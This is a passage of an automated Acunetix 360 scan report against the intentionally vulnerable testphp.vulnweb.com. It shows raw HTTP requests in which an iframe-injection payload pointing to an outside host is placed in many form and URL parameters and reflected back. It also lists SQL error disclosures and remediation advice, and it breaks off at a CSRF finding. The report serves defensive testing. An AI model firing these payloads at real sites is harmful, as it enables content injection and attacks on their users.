GET /hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 103.9304

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:46:52 GMT

<iframe src="http://r87.com/?"></iframe>12

11.5. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

CONFIRMED

Method	Parameter	Value
GET	p	valid
GET	pp	<iframe src="http://r87.com/?"></iframe>
GET	aaaa%2f

Request Response Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 1461.8301

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:47:41 GMT

valid<iframe src="http://r87.com/?"></iframe>

11.6. http://testphp.vulnweb.com/listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

CONFIRMED

Method	Parameter	Value
GET	artist	<iframe src="http://r87.com/?"></iframe>

Request Response Go to the highlighted output

Request

GET /listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 1876.5203

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<iframe src="http://r87.com/?"></iframe>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="
…

11.7. http://testphp.vulnweb.com/listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e

CONFIRMED

Method	Parameter	Value
GET	cat	<iframe src="http://r87.com/?"></iframe>

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 906.4359

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<iframe src="http://r87.com/?"></iframe>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="
…

11.8. http://testphp.vulnweb.com/search.php?test=query

CONFIRMED

Method	Parameter	Value
POST	searchFor	<iframe src="http://r87.com/?"></iframe>
POST	goButton	go
POST	test	query

Request Response Go to the highlighted output

Request

POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

searchFor=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&goButton=go

Response

Response Time (ms) : 1420.9996

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
="right">
		</td>
	</tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	<h2 id='pageName'>searched for: <iframe src="http://r87.com/?"></iframe></h2></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <i
…

11.9. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	invicti@example.com
POST	uaddress	<iframe src="http://r87.com/?"></iframe>
POST	ucc	4916613944329494
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	3
POST	urname	Smith
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=invicti%40example.com&uaddress=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&ucc=4916613944329494&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=3&urname=Smith&signup=signup

Response

Response Time (ms) : 253.0007

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:30:51 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: <iframe src="http://r87.com/?"></iframe></li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

11.10. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	<iframe src="http://r87.com/?"></iframe>
POST	uaddress	3
POST	ucc	4916613944329494
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	3
POST	urname	Smith
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 189
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&uaddress=3&ucc=4916613944329494&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=3&urname=Smith&signup=signup

Response

Response Time (ms) : 1581.5932

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:31:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: <iframe src="http://r87.com/?"></iframe></li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

11.11. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	invicti@example.com
POST	uaddress	3
POST	ucc	<iframe src="http://r87.com/?"></iframe>
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	3
POST	urname	Smith
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=invicti%40example.com&uaddress=3&ucc=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=3&urname=Smith&signup=signup

Response

Response Time (ms) : 224.3088

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:32:06 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: <iframe src="http://r87.com/?"></iframe></li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

11.12. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail
POST	uaddress
POST	ucc
POST	upass2
POST	uuname	<iframe src="http://r87.com/?"></iframe>
POST	upass
POST	uphone
POST	urname
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=&uaddress=&ucc=&upass2=&uuname=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&upass=&uphone=&urname=&signup=signup

Response

Response Time (ms) : 304.5124

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:32:57 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: <iframe src="http://r87.com/?"></iframe></li><li>Password: </li><li>Name: </li><li>Address: </li><li>E-Mail: </li><li>Phone number: </li><li>Credit card: </li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

11.13. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	invicti@example.com
POST	uaddress	3
POST	ucc	4916613944329494
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	<iframe src="http://r87.com/?"></iframe>
POST	urname	Smith
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=invicti%40example.com&uaddress=3&ucc=4916613944329494&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&urname=Smith&signup=signup

Response

Response Time (ms) : 283.2154

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:33:58 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: <iframe src="http://r87.com/?"></iframe></li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

11.14. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	uemail	invicti@example.com
POST	uaddress	3
POST	ucc	4916613944329494
POST	upass2	Inv1@cti
POST	uuname	Smith
POST	upass	Inv1@cti
POST	uphone	3
POST	urname	<iframe src="http://r87.com/?"></iframe>
POST	signup	signup

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 205
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

uemail=invicti%40example.com&uaddress=3&ucc=4916613944329494&upass2=Inv1%40cti&uuname=Smith&upass=Inv1%40cti&uphone=3&urname=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&signup=signup

Response

Response Time (ms) : 231.8185

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:34:30 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: <iframe src="http://r87.com/?"></iframe></li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

11.15. http://testphp.vulnweb.com/showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160

Method	Parameter	Value
GET	file	<iframe src="http://r87.com/?"></iframe>
GET	size	160

Notes

Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 419.8135

Total Bytes Received : 197

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:22:15 GMT


Warning: fopen(): Unable to access <iframe src="http://r87.com/?"></iframe> in /hj/var/www/showimage.php on line 19

Warning: fopen(<iframe src="http://r87.com/?"></iframe>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 25

Show Remediation Hide Remediation

Remedy

Where possible do not use users' input for URLs.
If you definitely need dynamic URLs, make a list of valid accepted URLs and do not accept other URLs.
Ensure that you only accept URLs which are located on accepted domains.
Use CSP to whitelist iframe source URLs explicitly.

External References

CLASSIFICATION

HIPAA

CVSS 3.0 SCORE
Base	4.7 (Medium)
Temporal	4.7 (Medium)
Environmental	4.7 (Medium)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

CVSS 3.1 SCORE
Base	4.7 (Medium)
Temporal	4.7 (Medium)
Environmental	4.7 (Medium)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

12. SSL/TLS Not Implemented

MEDIUM

Acunetix 360 detected that SSL/TLS is not implemented.

Impact

An attacker who is able to intercept your - or your users' - network traffic can read and modify any messages that are exchanged with your server.

That means that an attacker can see passwords in clear text, modify the appearance of your website, redirect the user to other web pages or steal session information.

Therefore no message you send to the server remains confidential.

Vulnerabilities

12.1. https://testphp.vulnweb.com/

Certainty

Request Response Go to the highlighted output

Request

[NETSPARKER] SSL Connection

Response

Response Time (ms) : 1

Total Bytes Received : 27

Body Length : 0

Is Compressed : No

[NETSPARKER] SSL Connection

Show Remediation Hide Remediation

Remedy

We suggest that you implement SSL/TLS properly, for example by using the Certbot tool provided by the Let's Encrypt certificate authority. It can automatically configure most modern web servers, e.g. Apache and Nginx to use SSL/TLS. Both the tool and the certificates are free and are usually installed within minutes.

CLASSIFICATION

HIPAA

164.306

CVSS 3.0 SCORE
Base	6.8 (Medium)
Temporal	6.1 (Medium)
Environmental	6.1 (Medium)

CVSS Vector String
CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

CVSS 3.1 SCORE
Base	6.8 (Medium)
Temporal	6.1 (Medium)
Environmental	6.1 (Medium)

CVSS Vector String
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

13. Version Disclosure (PHP)

LOW

Acunetix 360 identified a version disclosure (PHP) in target web server's HTTP response.

This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Vulnerabilities

13.1. http://testphp.vulnweb.com/

Extracted Version

5.3.10

Certainty

Request Response Go to the highlighted output

Request

GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 199.9404

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:01:05 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

…

Show Remediation Hide Remediation

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

CLASSIFICATION

HIPAA

14. Database Error Message Disclosure

LOW

Acunetix 360 identified a database error message disclosure.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL injection vulnerability. Most of the time Acunetix 360 will detect and report that problem separately.

Vulnerabilities

14.1. http://testphp.vulnweb.com/listproducts.php?cat=%2527

Method	Parameter	Value
GET	cat	%27

Certainty

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=%2527 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 256.9622

Total Bytes Received : 216

Body Length : 0

Is Compressed : No


…
emo</a>
	</td>
	<td align="right">
		</td>
	</tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div
…

Show Remediation Hide Remediation

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

CLASSIFICATION

HIPAA

15. Version Disclosure (Nginx)

LOW

Acunetix 360 identified a version disclosure (Nginx) in the target web server's HTTP response.

This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Nginx.

Impact

An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Vulnerabilities

15.1. http://testphp.vulnweb.com/

Extracted Version

1.4.1

Certainty

Request Response Go to the highlighted output

Request

GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 199.9404

Total Bytes Received : 216

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Encoding: 
Content-Type: text/html
Transfer-Encoding: chunked
Date: Sun, 29 Mar 1970 16:01:05 GMT

<!DOCTYPE HTML PUBLI
…

Show Remediation Hide Remediation

Remedy

Add the following line to your nginx.conf file to prevent information leakage from the SERVER header of its HTTP response:

	server_tokens off

CLASSIFICATION

HIPAA

16. [Possible] Cross-site Request Forgery

LOW

Acunetix 360 identified a possible Cross-Site Request Forgery.

CSRF is a very common vulnerability. It's an attack which forces a user to execute unwanted actions on a web application in which the user is currently authenticated.

Impact

Depending on the application, an attacker can mount any of the actions that can be done by the user such as adding a user, modifying content, deleting data. All the functionality that’s available to the victim can be used by the attacker. Only exception to this rule is a page that requires extra information that only the legitimate user can know (such as user’s password).

Vulnerabilities

16.1. http://testphp.vulnweb.com/guestbook.php

Form Name(s)

faddentry

Certainty

Request Response Go to the highlighted output

Request

GET /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Acunetix 360

Response

